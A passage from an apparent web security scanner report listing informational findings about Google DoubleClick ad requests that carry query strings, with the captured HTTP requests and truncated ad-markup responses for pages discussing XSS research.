<!doctype html><html><head><style></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/4.16.2011-xss-cross-site-scripting-dork-poc-example-report-vulnerable-server.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.google.com/AdWords%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGlkB4Bft2ebtQqnbM89Hd-0cuHEA" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script><iframe style="display:none" src="http://p4.gzko2lfj5niqs.xz3ddzmhheuysknr.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html"></iframe>
...[SNIP]...

15.27. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315157559&flash=10.3.183&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html&dt=1315139558764&bpp=4&shv=r20110824&jsv=r20110719&correlator=1315139559131&frm=4&adk=1607234649&ga_vid=908310405.1315139559&ga_sid=1315139559&ga_hid=1398972348&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1033&bih=894&fu=0&ifi=1&dtd=385&xpc=lkVIacehW0&p=file%3A//

The response contains the following links to other domains:

http://p4.dopjo7bdltoxq.fyhpecgfliaponup.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/2011/09/04/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.qualys.com/dummies%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGI5wFY2o0oSKsZFQFGUv_S4rbWaw

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315157559&flash=10.3.183&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html&dt=1315139558764&bpp=4&shv=r20110824&jsv=r20110719&correlator=1315139559131&frm=4&adk=1607234649&ga_vid=908310405.1315139559&ga_sid=1315139559&ga_hid=1398972348&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1033&bih=894&fu=0&ifi=1&dtd=385&xpc=lkVIacehW0&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 12:32:01 GMT
Server: cafe
Cache-Control: private
Content-Length: 4253
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///D:/cdn/2011/09/04/ghdb/dork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.qualys.com/dummies%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGI5wFY2o0oSKsZFQFGUv_S4rbWaw" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script><iframe style="display:none" src="http://p4.dopjo7bdltoxq.fyhpecgfliaponup.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html"></iframe>
...[SNIP]...

15.28. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1311268456&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fusa.kapersky.com.12-18-2010.html&dt=1315139686984&bpp=11&shv=r20110824&jsv=r20110719&correlator=1315139687617&frm=4&adk=1607234649&ga_vid=950282737.1315139694&ga_sid=1315139694&ga_hid=1191353276&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1033&bih=894&eid=36887101&ref=http%3A%2F%2Fxss.cx%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html&fu=0&ifi=1&dtd=6816&xpc=GnGrVkxZfy&p=http%3A//xss.cx

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://pagead2.googlesyndication.com/pagead/sma8.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/usa.kapersky.com.12-18-2010.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.kaspersky.com%26adT%3D%252420%2BDollars%2BOff%2BKaspersky%26adU%3Dwww.Norton.com%26adT%3DFree%2BNorton%2BDownload%26adU%3Davg.com/Antivirus%26adT%3DFree%2BAntivirus%2BDownload%26gl%3DUS&usg=AFQjCNFWnjD7mvpFZuTPW7R0MJk1s2AYBw

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1311268456&flash=10.3.183&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fusa.kapersky.com.12-18-2010.html&dt=1315139686984&bpp=11&shv=r20110824&jsv=r20110719&correlator=1315139687617&frm=4&adk=1607234649&ga_vid=950282737.1315139694&ga_sid=1315139694&ga_hid=1191353276&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1033&bih=894&eid=36887101&ref=http%3A%2F%2Fxss.cx%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html&fu=0&ifi=1&dtd=6816&xpc=GnGrVkxZfy&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

15.29. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4634662068732588&output=html&h=250&slotname=0615220379&w=300&lmt=1315156450&flash=10.3.183&url=http%3A%2F%2Fwww.h-online.com%2Fsecurity%2Fnews%2Fitem%2FphpMyAdmin-updates-close-XSS-hole-1331093.html&dt=1315138450773&bpp=20&shv=r20110824&jsv=r20110719&correlator=1315138450900&frm=4&adk=686343258&ga_vid=1241471896.1315138451&ga_sid=1315138451&ga_hid=277447158&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=helvetica&dfs=16&biw=1217&bih=1037&ref=http%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db&fu=0&ifi=1&dtd=131&xpc=WPJXpnRrzr&p=http%3A//www.h-online.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js
http://view.atdmt.com/AAS/iview/262448070/direct;wi.300;hi.250/01/2085102678?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBSrFjbWtjTtjUG43mjQTL36DwAdWc--MC1Z2r7RjAjbcBsJHjBRABGAEg0ZuaDDgAUNzR3eIFYMnW-obIo6AZoAGb-YzjA7IBEHd3dy5oLW9ubGluZS5jb226AQozMDB4MjUwX2FzyAEJ2gFZaHR0cDovL3d3dy5oLW9ubGluZS5jb20vc2VjdXJpdHkvbmV3cy9pdGVtL3BocE15QWRtaW4tdXBkYXRlcy1jbG9zZS1YU1MtaG9sZS0xMzMxMDkzLmh0bWy4AhjIAsXlgR6oAwHoA9gC6AO6AugD4AXoA90F6AMF9QMAAABA9QMgAAAAoAYR%26num%3D1%26sig%3DAOD64_2iDbKC1OYHekwzQS9IyMapHfsrow%26client%3Dca-pub-4634662068732588%26adurl%3D
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.h-online.com/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html%26hl%3Den%26client%3Dca-pub-4634662068732588%26adU%3Dwww.adt.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNFVoP1_sXRrToUjoN_9AhRjpGspZw

Request

GET /pagead/ads?client=ca-pub-4634662068732588&output=html&h=250&slotname=0615220379&w=300&lmt=1315156450&flash=10.3.183&url=http%3A%2F%2Fwww.h-online.com%2Fsecurity%2Fnews%2Fitem%2FphpMyAdmin-updates-close-XSS-hole-1331093.html&dt=1315138450773&bpp=20&shv=r20110824&jsv=r20110719&correlator=1315138450900&frm=4&adk=686343258&ga_vid=1241471896.1315138451&ga_sid=1315138451&ga_hid=277447158&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=helvetica&dfs=16&biw=1217&bih=1037&ref=http%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db&fu=0&ifi=1&dtd=131&xpc=WPJXpnRrzr&p=http%3A//www.h-online.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 12:13:34 GMT
Server: cafe
Cache-Control: private
Content-Length: 2753
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><iframe src="http://view.atdmt.com/AAS/iview/262448070/direct;wi.300;hi.250/01/2085102678?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBSrFjbWtjTtjUG43mjQTL36DwAdWc--MC1Z2r7RjAjbcBsJHjBRABGAEg0ZuaDDgAUNzR3eIFYMnW-obIo6AZoAGb-YzjA7IBEHd3dy5oLW9ubGluZS5jb226AQozMDB4MjUwX2FzyAEJ2gFZaHR0cDovL3d3dy5oLW9ubGluZS5jb20vc2VjdXJpdHkvbmV3cy9pdGVtL3BocE15QWRtaW4tdXBkYXRlcy1jbG9zZS1YU1MtaG9sZS0xMzMxMDkzLmh0bWy4AhjIAsXlgR6oAwHoA9gC6AO6AugD4AXoA90F6AMF9QMAAABA9QMgAAAAoAYR%26num%3D1%26sig%3DAOD64_2iDbKC1OYHekwzQS9IyMapHfsrow%26client%3Dca-pub-4634662068732588%26adurl%3D" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250"> <script language="JavaScript" type="text/javascript">
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.h-online.com/security/news/item/phpMyAdmin-updates-close-XSS-hole-1331093.html%26hl%3Den%26client%3Dca-pub-4634662068732588%26adU%3Dwww.adt.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNFVoP1_sXRrToUjoN_9AhRjpGspZw" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

15.30. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2506416544986565&format=728x90_as&output=html&h=90&w=728&lmt=1315162480&ad_type=text_image&color_bg=C0C0C0&color_border=000000&color_link=000000&color_text=006699&color_url=0000FF&flash=10.3.183&url=http%3A%2F%2Fwww.lexjansen.com%2Fvirus%2F&dt=1315144530181&bpp=64&shv=r20110824&jsv=r20110719&correlator=1315144530246&frm=4&adk=3076922404&ga_vid=537750246.1315144530&ga_sid=1315144530&ga_hid=124942089&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&biw=1049&bih=910&eid=36887101&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dsite%253Axss.cx%2Busa.kapersky.com%23sclient%3Dpsy%26hl%3Den%26tbo%3D1%26tbs%3Dqdr%3Ad%26source%3Dhp%26q%3Dkapersky%2Bxss%26pbx%3D1%26oq%3Dkapersky%2Bxss%26aq%3Df%26aqi%3Dg-s5%26aql%3D%26gs_sm%3De%26gs_upl%3D40940l44815l1l44931l28l13l12l0l0l3l1252l5070l4-1.1.2.2l7l0%26tbo%3D1%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&fu=0&ifi=1&dtd=69&xpc=H0Keep2i8i&p=http%3A//www.lexjansen.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.lexjansen.com/virus/%26hl%3Den%26client%3Dca-pub-2506416544986565%26adU%3Dwww.saintcorporation.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNFepV91JA4LF1xtSZabc7z1UKTglQ

Request

GET /pagead/ads?client=ca-pub-2506416544986565&format=728x90_as&output=html&h=90&w=728&lmt=1315162480&ad_type=text_image&color_bg=C0C0C0&color_border=000000&color_link=000000&color_text=006699&color_url=0000FF&flash=10.3.183&url=http%3A%2F%2Fwww.lexjansen.com%2Fvirus%2F&dt=1315144530181&bpp=64&shv=r20110824&jsv=r20110719&correlator=1315144530246&frm=4&adk=3076922404&ga_vid=537750246.1315144530&ga_sid=1315144530&ga_hid=124942089&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&biw=1049&bih=910&eid=36887101&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dsite%253Axss.cx%2Busa.kapersky.com%23sclient%3Dpsy%26hl%3Den%26tbo%3D1%26tbs%3Dqdr%3Ad%26source%3Dhp%26q%3Dkapersky%2Bxss%26pbx%3D1%26oq%3Dkapersky%2Bxss%26aq%3Df%26aqi%3Dg-s5%26aql%3D%26gs_sm%3De%26gs_upl%3D40940l44815l1l44931l28l13l12l0l0l3l1252l5070l4-1.1.2.2l7l0%26tbo%3D1%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&fu=0&ifi=1&dtd=69&xpc=H0Keep2i8i&p=http%3A//www.lexjansen.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

15.31. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4358676377058562&output=html&h=90&slotname=1253766630&w=728&lmt=1315156431&flash=10.3.183&url=http%3A%2F%2Flwn.net%2FArticles%2F456878%2F&dt=1315138427671&bpp=12&shv=r20110824&jsv=r20110719&prev_fmts=120x240_as&correlator=1315138423737&frm=4&adk=1376058984&ga_vid=2110831794.1315138425&ga_sid=1315138425&ga_hid=1381620674&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1217&bih=1021&ref=http%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db&fu=0&ifi=2&dtd=3813&xpc=e7ViOLo9V0&p=http%3A//lwn.net

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://lwn.net/Articles/456878/%26hl%3Den%26client%3Dca-pub-4358676377058562%26adU%3Dwww.saintcorporation.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHa2GvYzfHw3oH6_GqxBaRjhSprNg

Request

GET /pagead/ads?client=ca-pub-4358676377058562&output=html&h=90&slotname=1253766630&w=728&lmt=1315156431&flash=10.3.183&url=http%3A%2F%2Flwn.net%2FArticles%2F456878%2F&dt=1315138427671&bpp=12&shv=r20110824&jsv=r20110719&prev_fmts=120x240_as&correlator=1315138423737&frm=4&adk=1376058984&ga_vid=2110831794.1315138425&ga_sid=1315138425&ga_hid=1381620674&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1217&bih=1021&ref=http%3A%2F%2Fwww.google.com%2F%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db&fu=0&ifi=2&dtd=3813&xpc=e7ViOLo9V0&p=http%3A//lwn.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

15.32. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9490115737908119&output=html&h=60&slotname=2569267561&w=468&lmt=1315162486&flash=10.3.183&url=http%3A%2F%2Fwww.whatisnetwork.com%2Fnews-events%2F114520%2Fkaspersky-website-vulnerable-to-xss.html&dt=1315144527252&bpp=20&shv=r20110824&jsv=r20110719&correlator=1315144527296&frm=4&adk=4025018506&ga_vid=751015070.1315144527&ga_sid=1315144527&ga_hid=196803028&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&biw=1033&bih=910&eid=36887101&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dsite%253Axss.cx%2Busa.kapersky.com%23sclient%3Dpsy%26hl%3Den%26tbo%3D1%26tbs%3Dqdr%3Ad%26source%3Dhp%26q%3Dkapersky%2Bxss%26pbx%3D1%26oq%3Dkapersky%2Bxss%26aq%3Df%26aqi%3Dg-s5%26aql%3D%26gs_sm%3De%26gs_upl%3D40940l44815l1l44931l28l13l12l0l0l3l1252l5070l4-1.1.2.2l7l0%26tbo%3D1%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&fu=0&ifi=1&dtd=136&xpc=C87ya72PQK&p=http%3A//www.whatisnetwork.com

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.whatisnetwork.com/news-events/114520/kaspersky-website-vulnerable-to-xss.html%26hl%3Den%26client%3Dca-pub-9490115737908119%26adU%3Dgfi.com/vipre-business-antivirus%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHtu5ZLS2FayxMDyEzq-MQ_PXvpXA

Request

GET /pagead/ads?client=ca-pub-9490115737908119&output=html&h=60&slotname=2569267561&w=468&lmt=1315162486&flash=10.3.183&url=http%3A%2F%2Fwww.whatisnetwork.com%2Fnews-events%2F114520%2Fkaspersky-website-vulnerable-to-xss.html&dt=1315144527252&bpp=20&shv=r20110824&jsv=r20110719&correlator=1315144527296&frm=4&adk=4025018506&ga_vid=751015070.1315144527&ga_sid=1315144527&ga_hid=196803028&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&biw=1033&bih=910&eid=36887101&ref=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dsite%253Axss.cx%2Busa.kapersky.com%23sclient%3Dpsy%26hl%3Den%26tbo%3D1%26tbs%3Dqdr%3Ad%26source%3Dhp%26q%3Dkapersky%2Bxss%26pbx%3D1%26oq%3Dkapersky%2Bxss%26aq%3Df%26aqi%3Dg-s5%26aql%3D%26gs_sm%3De%26gs_upl%3D40940l44815l1l44931l28l13l12l0l0l3l1252l5070l4-1.1.2.2l7l0%26tbo%3D1%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&fu=0&ifi=1&dtd=136&xpc=C87ya72PQK&p=http%3A//www.whatisnetwork.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

15.33. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

